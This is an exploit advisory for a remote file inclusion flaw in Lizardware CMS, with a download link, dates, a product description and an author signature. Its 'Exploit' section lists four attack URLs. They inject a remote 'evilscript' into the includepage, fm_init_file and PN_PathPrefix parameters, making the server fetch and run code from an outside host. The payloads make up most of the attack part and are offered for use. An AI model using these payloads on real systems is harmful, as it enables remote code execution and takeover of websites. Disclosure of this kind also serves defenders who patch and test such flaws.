Lizardware CMS suffers from a remote file inclusion vulnerability.
18136fdeedb1693c51ebb6e0175b2a1ebecbec7d6612da0bb8b7d181084f44d9
Lizardware CMS Remote File Inclusion
---------|
Download:|
---------|---------------------------------------------------------|
http://sourceforge.net/project/platformdownload.php?group_id=183519|
-------------------------------------------------------------------|
-----------------------|
Launched .:2007-03-31:.|
-----------------------|
-----------------|
Timeline:17.11.07|
-----------------|
------------|
Description |
------------|------------------------------------------------------------------------------|
Lizardware CMS is taking Content Management Systems to a new height combined with a custom |
admin browser to make administrating your site easier on bandwidth, incorporating |
a Debian style library for its plugin management and many new and unique components |
-------------------------------------------------------------------------------------------|
-------|
Exploit|
-------|----------------------------------------------------------------|
http://host.com/index.php?includepage=http://host.com/evilscript? |
http://host.com/fmp_admin.php?fm_init_file=http://host.com/evilscript? |
http://host.com/file.php?fm_init_file=http://host.com/evilscript? |
http://host.com/fmp_admin.php?PN_PathPrefix=http://host.com/evilscript? |
------------------------------------------------------------------------|
------|
Author|
------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy[at]yahoo[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member ..."we're not the only ones but we're the best"